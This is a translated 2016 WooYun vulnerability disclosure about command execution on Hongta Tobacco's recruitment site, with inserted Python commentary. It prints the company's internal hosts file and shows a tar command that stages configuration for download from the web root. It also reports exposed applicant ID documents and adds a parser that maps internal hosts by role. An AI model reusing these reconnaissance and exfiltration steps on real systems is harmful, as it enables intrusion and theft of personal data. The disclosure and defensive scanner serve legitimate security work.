
Vulnerability Summary

Defect ID: wooyun-2016-0208801

Title: A Hongta Tobacco system has a command execution vulnerability (large volume of applicants' ID documents and resumes exposed; the internal network can be threatened)

Affected vendor: Hongta Tobacco (Group) Co., Ltd.

Author: 路人甲

Submitted: 2016-05-15 10:26

Fixed: 2016-07-04 08:20

Published: 2016-07-04 08:20

Vulnerability type: command execution

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2016-05-15: Details sent to the vendor; awaiting vendor action
2016-05-20: Vendor confirmed; details visible to the vendor only
2016-05-30: Details disclosed to core white hats and domain experts
2016-06-09: Details disclosed to regular white hats
2016-06-19: Details disclosed to intern white hats
2016-07-04: Details disclosed to the public

Brief description:

Command execution

Detailed description:

Hongta recruitment site

[Screenshot: QQ截图20160514220652.png]

http://zp.hongta.com/HRWEB/hr/recruitInfoParentAction/getNotices

[Screenshot: QQ截图20160514220306.png]

[Screenshot: QQ截图20160514220255.png]

Proof of vulnerability:

★K8cmd-> cat /etc/hosts
====================================================================================================================================
127.0.0.1 localhost loopback
::1 localhost loopback
10.96.66.138 c1ep2vm138.hongta.com c1ep2vm138
10.96.66.13 c1ep1vm13.hongta.com
10.96.66.22 c1ep1vm22.hongta.com
10.96.66.194 c1ep3vm194.hongta.com c1ep3vm194
fd8c:215d:178e:1419:6bcd:13ff:fe60:d84d c1ep2vm138-6.hongta.com c1ep2vm138-6
fd8c:215d:178e:1419:290:fa71:fa37:f562 ntp28216.hongta.com ntp28216
fd8c:215d:178e:1419:290:fa72:fa37:f562 IBMWorkloadDeployer
#bpm db server
10.96.66.11 c1ep1vm11.hongta.com
10.96.66.12 c1ep1vm12.hongta.com
10.96.66.13 c1ep1vm13.hongta.com
10.96.66.22 c1ep1vm22.hongta.com
#bpm http server
10.96.66.9 c1ep1vm9.hongta.com
10.96.66.25 c1ep1vm25.hongta.com
#bpm was
10.96.66.26 c1ep1vm26.hongta.com
10.96.66.27 c1ep1vm27.hongta.com
10.96.66.31 c1ep1vm31.hongta.com
#bpm was console
10.96.66.24 c1ep1vm24.hongta.com
#ep was
10.96.66.32 c1ep1vm32.hongta.com
10.96.66.33 c1ep1vm33.hongta.com
10.96.66.34 c1ep1vm34.hongta.com
10.96.66.35 c1ep1vm35.hongta.com
#ep http server
10.96.66.36 c1ep1vm36.hongta.com
10.96.66.37 c1ep1vm37.hongta.com
#ep was console
10.96.66.38 c1ep1vm38.hongta.com
#tam tim server
10.96.66.30 c1ep1vm30.hongta.com
10.96.66.40 c1ep1vm40.hongta.com
#ldap
10.96.66.29 c1ep1vm29.hongta.com
10.96.66.46 c1ep1vm46.hongta.com
10.96.66.47 c1ep1vm47.hongta.com
#org server
10.96.66.53 c1ep1vm53.hongta.com
#issue server
10.96.66.48 c1ep1vm48.hongta.com
#hr zp ihs
10.96.66.19 c1ep1vm19.hongta.com
#hr zp was
10.96.66.138 c1ep1vm138.hongta.com
10.96.66.195 c1ep1vm195.hongta.com
10.96.66.194 c1ep1vm194.hongta.com
#mobile was
10.96.66.130 c1ep1vm130.hongta.com
10.96.66.132 c1ep1vm132.hongta.com
10.96.66.133 c1ep1vm133.hongta.com
#mobile ihs
10.96.66.137 c1ep1vm137.hongta.com
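
The hosts file above is the real value of this finding for an attacker: the comment lines label each block of addresses by role (BPM database, LDAP, TAM/TIM, the HR recruitment WAS nodes), so one command maps the internal estate. As an added example (my own code, not part of the original report and not from the K8cmd tool), here is a small Python parser that turns a dump of this shape into a role-to-host map, a deduplicated IPv4 scope list, and a list of addresses that the file maps to more than one name. The embedded HOSTS_DUMP is an excerpt of the output shown above; the only assumption is that a comment line labels every entry that follows it until the next comment.

```python
"""Turn a leaked /etc/hosts into an internal-network map.

Added example, not part of the original report. The role names come from
the comment lines (#bpm db server, #ldap, ...) that precede each block.
"""
import ipaddress
from collections import defaultdict

# Excerpt of the /etc/hosts output shown in the report (page data, not constructed).
HOSTS_DUMP = """\
127.0.0.1 localhost loopback
::1 localhost loopback
10.96.66.138 c1ep2vm138.hongta.com c1ep2vm138
10.96.66.13 c1ep1vm13.hongta.com
fd8c:215d:178e:1419:290:fa71:fa37:f562 ntp28216.hongta.com ntp28216
#bpm db server
10.96.66.11 c1ep1vm11.hongta.com
10.96.66.13 c1ep1vm13.hongta.com
#bpm was
10.96.66.26 c1ep1vm26.hongta.com
#ldap
10.96.66.29 c1ep1vm29.hongta.com
10.96.66.46 c1ep1vm46.hongta.com
#hr zp was
10.96.66.138 c1ep1vm138.hongta.com
10.96.66.194 c1ep1vm194.hongta.com
"""


def parse_hosts(text, default_role="(unlabelled)"):
    """Return {role: [(ip, [name, alias, ...]), ...]} keyed by the preceding comment.

    Lines whose first token is not an IP address (the tool banner, the
    separator line, blank lines) are skipped rather than treated as hosts.
    """
    role = default_role
    groups = defaultdict(list)
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#"):
            role = line.lstrip("#").strip() or role
            continue
        parts = line.split()
        if not parts:
            continue
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue
        groups[role].append((str(ip), parts[1:]))
    return dict(groups)


def scope_ipv4(groups):
    """Deduplicated, numerically sorted IPv4 targets, loopback excluded."""
    addrs = set()
    for entries in groups.values():
        for ip, _ in entries:
            addr = ipaddress.ip_address(ip)
            if addr.version == 4 and not addr.is_loopback:
                addrs.add(addr)
    return [str(a) for a in sorted(addrs)]


def name_conflicts(groups):
    """IPs that the file maps to more than one primary name.

    In the report 10.96.66.138 appears as both c1ep2vm138 and c1ep1vm138, a
    sign of stale or copy-pasted entries worth confirming with reverse DNS.
    """
    names = defaultdict(set)
    for entries in groups.values():
        for ip, aliases in entries:
            if aliases:
                names[ip].add(aliases[0])
    return {ip: sorted(n) for ip, n in names.items() if len(n) > 1}


if __name__ == "__main__":
    g = parse_hosts(HOSTS_DUMP)
    for role, entries in g.items():
        print(role, [ip for ip, _ in entries])
    print("scope:", scope_ipv4(g))
    print("conflicts:", name_conflicts(g))
```

Feed it the full dump from the report and the role map alone tells a tester which addresses are the LDAP and database tier and which are the WAS consoles; the conflict list is the reminder that a hosts file is an operator's note, not an authoritative inventory.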


[Screenshot: QQ截图20160514231710.png]

The server holds a large volume of applicants' ID documents.

[Screenshots: QQ截图20160514233044.png, QQ截图20160514233211.png, QQ截图20160514233355.png, QQ截图20160514233537.png, QQ截图20160514233658.png, QQ截图20160514233750.png, QQ截图20160514233829.png, QQ截图20160514233915.png]


All of these resources are in this directory:

/opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.war/upload/

[Screenshot: QQ截图20160514234048.png]

[Screenshot: QQ截图20160514234302.png]

Pack them up and every file comes down in one go. Say I want to look at the configuration:

tar -cvf /opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.war/wpp.tar.gz /opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.war/WEB-INF/

(Note that -cvf writes a plain, uncompressed tar; the .tar.gz name is only a label.) Then fetch http://zp.hongta.com/HRWEB/wpp.tar.gz and the configuration is downloaded; the ID documents are even easier.
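
The step above works because anything written under the deployed WAR root outside WEB-INF and META-INF is served by the container, so an archive dropped there is a ready-made exfiltration file, and the upload/ directory with the applicants' documents was already being served the same way. As an added example (my own code, not part of the original report or of WebSphere), here is the check a defender would run over an installedApps tree after an incident like this: walk the served part of a WAR, identify archives by content rather than by name (the report's tar carries a misleading .tar.gz extension), and report them. The demo layout mirrors the report's HRWEB.war paths but its contents are constructed; the .jar under WEB-INF/lib is there to show that the unserved tree is deliberately ignored.

```python
"""Hunt for archives dropped into a deployed WAR's served tree.

Added example, not part of the original report. Files under WEB-INF and
META-INF are never served directly by a servlet container; everything else
under the WAR root is, so an archive there is staged for download.
"""
import os
import tarfile
import tempfile

SUSPECT_EXT = (".tar", ".tar.gz", ".tgz", ".zip", ".7z", ".rar", ".bak", ".sql")
UNSERVED_DIRS = ("WEB-INF", "META-INF")


def archive_kind(path):
    """Identify an archive by content, not name: gzip/zip magic or a ustar header."""
    with open(path, "rb") as f:
        head = f.read(512)
    if head.startswith(b"\x1f\x8b"):
        return "gzip"
    if head.startswith(b"PK\x03\x04"):
        return "zip"
    if head[257:262] == b"ustar":  # POSIX, GNU and PAX tar all put "ustar" at offset 257
        return "tar"
    return None


def scan_war(war_dir):
    """Return findings for archive-like files in the served part of the WAR."""
    findings = []
    for root, dirs, files in os.walk(war_dir):
        if root == war_dir:
            dirs[:] = [d for d in dirs if d not in UNSERVED_DIRS]  # prune unserved trees
        for name in files:
            path = os.path.join(root, name)
            kind = archive_kind(path)
            if kind is None and not name.lower().endswith(SUSPECT_EXT):
                continue
            findings.append({
                "path": os.path.relpath(path, war_dir),
                "type": kind or "suspicious-extension",
                "bytes": os.path.getsize(path),
            })
    return sorted(findings, key=lambda f: f["path"])


def build_demo_war():
    """Constructed layout mirroring the report's HRWEB.war (no real data)."""
    war = os.path.join(tempfile.mkdtemp(), "HRWEB.war")
    os.makedirs(os.path.join(war, "WEB-INF", "lib"))
    os.makedirs(os.path.join(war, "upload"))
    with open(os.path.join(war, "WEB-INF", "web.xml"), "w") as f:
        f.write("<web-app/>")
    with open(os.path.join(war, "WEB-INF", "lib", "app.jar"), "wb") as f:
        f.write(b"PK\x03\x04" + b"\0" * 26)  # zip magic, but under WEB-INF: not served
    with open(os.path.join(war, "upload", "applicant.jpg"), "wb") as f:
        f.write(b"\xff\xd8\xff\xe0" + b"\0" * 16)  # served, but not an archive
    with open(os.path.join(war, "index.jsp"), "w") as f:
        f.write("<%= 1 %>")
    # The report's trick: tar -cvf writes an uncompressed tar, so the .tar.gz
    # name is a label only. Content sniffing still catches it.
    with tarfile.open(os.path.join(war, "wpp.tar.gz"), "w") as t:
        t.add(os.path.join(war, "WEB-INF"), arcname="WEB-INF")
    return war


if __name__ == "__main__":
    for finding in scan_war(build_demo_war()):
        print(finding)
```

Run it against each HRWEB.war-style directory under installedApps; on a clean deployment the served tree should contain nothing archive-shaped, so any hit is worth a look at its mtime and the access log for the matching GET.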

Fix recommendation:

Apply the patch and disable debug mode.

Copyright: when reposting, please credit 路人甲@乌云

Vendor Response

Vendor response:

Severity: Medium

Rank: 8

Confirmed: 2016-05-20 08:19

Vendor reply:

The vulnerability has been fixed.

Latest status:

None